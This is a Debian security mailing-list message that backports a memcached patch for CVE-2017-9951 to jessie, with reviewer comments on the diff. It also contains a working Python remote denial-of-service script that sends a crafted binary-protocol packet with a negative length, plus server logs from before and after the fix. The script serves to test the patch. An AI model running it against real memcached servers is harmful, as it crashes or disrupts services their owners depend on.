On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote:
> > Please adjust the affected versions in the BTS as needed.

Please find attached the debdiff for Debian 8 Jessie. Also, you can find a little test case (and results) without (CVE-2017-9951_exploit.log) and with the fix (CVE-2017-9951_fixed.log). I've built and tested it on a clean jessie schroot.

> Regards,
> Salvatore

-- 
Guillaume Delacour
diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog --- memcached-1.4.21/debian/changelog 2016-11-01 21:10:45.000000000 +0000 +++ memcached-1.4.21/debian/changelog 2017-07-24 20:07:10.000000000 +0000 @@ -1,3 +1,11 @@ +memcached (1.4.21-1.1+deb8u2) unstable; urgency=high + + * Non-maintainer upload by the Security Team. + * Fix CVE-2017-9951 by checking the integer length of commands that adds or + replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Mon, 24 Jul 2017 19:54:18 +0000 + memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high * Non-maintainer upload by the Security Team. diff -Nru memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 1970-01-01 00:00:00.000000000 +0000 +++ memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 2017-07-24 19:59:20.000000000 +0000 
@@ -0,0 +1,37 @@ +From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001 +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c ++++ b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++ if (nbytes < 2) ++ return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, &nsuffix); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c ++++ b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +- if (c->sbytes == 0) { ++ if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.21/debian/patches/series memcached-1.4.21/debian/patches/series --- memcached-1.4.21/debian/patches/series 2016-11-01 21:10:45.000000000 +0000 +++ memcached-1.4.21/debian/patches/series 2017-07-24 20:07:26.000000000 +0000 @@ -5,3 +5,4 @@ 06_eol_comment_handling.patch 07_disable_tests.patch 08_CVE-2016-8704_CVE-2016-8705_CVE-2016-8706.patch +09_CVE-2017-9951.patch
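Review bot: the changelog hunk names `unstable` as the target distribution in `+memcached (1.4.21-1.1+deb8u2) unstable; urgency=high`, while the version suffix `+deb8u2` and the previous entry (`jessie-security`) show this is a jessie security update; the distribution field should be `jessie-security` so the upload is routed to the security archive rather than rejected or misfiled. The entry text `checking the integer length of commands that adds or replaces key/value pair` would also read more precisely as `checking the value length of commands that add or replace a key/value pair`.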
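Review bot: in the items.c hunk, the new `if (nbytes < 2) return false;` at the top of item_size_ok() rejects a negative or sub-terminator value length before `item_make_header(nkey + 1, flags, nbytes, ...)` is evaluated with it, which is exactly what turns the `Out of memory allocating item` in the exploit log into the `Too large.` response in the fixed log. The comparison works because `nbytes` is declared `const int`; it would be worth a short comment in the patch header (alongside the existing `Origin:` line) stating that the bound is 2, not 0, so that a later backport does not loosen it.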
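Review bot: in the memcached.c hunk, changing the `conn_swallow` test from `c->sbytes == 0` to `c->sbytes <= 0` means a negative swallow count now returns the connection to `conn_new_cmd` instead of being read through indefinitely; keep this even though the items.c check rejects the request earlier, because it guards the state machine independently of the allocation path and costs nothing.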
#!/usr/bin/python
# thanks https://packetstormsecurity.com/files/121445/killthebox.py.txt &&
# https://www.twistlock.com/2017/07/13/cve-2017-9951-heap-overflow-memcached-server-1-4-38-twistlock-vulnerability-report/
import sys
import socket

print "Memcached Remote DoS"
if len(sys.argv) != 3:
    print "Usage: %s <host> <port>" %(sys.argv[0])
    sys.exit(1)

target = sys.argv[1]
port = sys.argv[2]
print "[+] Target Host: %s" %(target)
print "[+] Target Port: %s" %(port)

# 24-byte binary-protocol request header: magic 0x80, opcode 0x12,
# keylen 0x0001, extlen 0x08, bodylen 0xffffffe8 (negative as a signed int),
# followed by 8 bytes of extras (flags, expiry), the one-byte key "x"
# and the ASCII value "4141...".
kill = """\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff"""
kill +="""\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"""
kill +="""\x00\xff\xff\xff\xff\x01\x00\x00\0x{}""".format("41"*1000)

hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
    hax.connect((target, int(port)))
    print "[+] Connected, firing payload!"
except:
    print "[-] Connection Failed... Is there even a target?"
    sys.exit(1)

try:
    hax.send(kill)
    print "[+] Payload Sent!"
except:
    print "[-] Payload Sending Failure... WTF?"
    sys.exit(1)

hax.close()
print "[*] Should be dead..."
CVE-2017-9951_exploit.log:

<26 new auto-negotiating client connection
26: going from conn_new_cmd to conn_waiting
26: going from conn_waiting to conn_read
26: going from conn_read to conn_parse_cmd
26: Client using the binary protocol
<26 Read binary protocol data:
<26 0x80 0x12 0x00 0x01
<26 0x08 0x00 0x00 0x00
<26 0xff 0xff 0xff 0xe8
<26 0x00 0x00 0x00 0x00
<26 0x00 0x00 0x00 0x00
<26 0x00 0x00 0x00 0x00
26: going from conn_parse_cmd to conn_nread
<26 ADD x
Value len is -33
>26 Writing an error: Out of memory allocating item
>26 Writing bin response:
>26 0x81 0x12 0x00 0x00
>26 0x00 0x00 0x00 0x82
>26 0x00 0x00 0x00 0x1d
>26 0x00 0x00 0x00 0x00
>26 0x00 0x00 0x00 0x00
>26 0x00 0x00 0x00 0x00
26: going from conn_nread to conn_mwrite
26: going from conn_mwrite to conn_swallow
26: going from conn_swallow to conn_new_cmd
26: going from conn_new_cmd to conn_parse_cmd
<26 Read binary protocol data:
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
Invalid magic: 34
26: going from conn_parse_cmd to conn_closing
<26 connection closed.
26: going from conn_closing to conn_closed
CVE-2017-9951_fixed.log:

<26 new auto-negotiating client connection
26: going from conn_new_cmd to conn_waiting
26: going from conn_waiting to conn_read
26: going from conn_read to conn_parse_cmd
26: Client using the binary protocol
<26 Read binary protocol data:
<26 0x80 0x12 0x00 0x01
<26 0x08 0x00 0x00 0x00
<26 0xff 0xff 0xff 0xe8
<26 0x00 0x00 0x00 0x00
<26 0x00 0x00 0x00 0x00
<26 0x00 0x00 0x00 0x00
26: going from conn_parse_cmd to conn_nread
<26 ADD x
Value len is -33
>26 Writing an error: Too large.
>26 Writing bin response:
>26 0x81 0x12 0x00 0x00
>26 0x00 0x00 0x00 0x03
>26 0x00 0x00 0x00 0x0a
>26 0x00 0x00 0x00 0x00
>26 0x00 0x00 0x00 0x00
>26 0x00 0x00 0x00 0x00
26: going from conn_nread to conn_mwrite
26: going from conn_mwrite to conn_swallow
26: going from conn_swallow to conn_new_cmd
26: going from conn_new_cmd to conn_parse_cmd
<26 Read binary protocol data:
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
<26 0x34 0x31 0x34 0x31
Invalid magic: 34
26: going from conn_parse_cmd to conn_closing
<26 connection closed.
26: going from conn_closing to conn_closed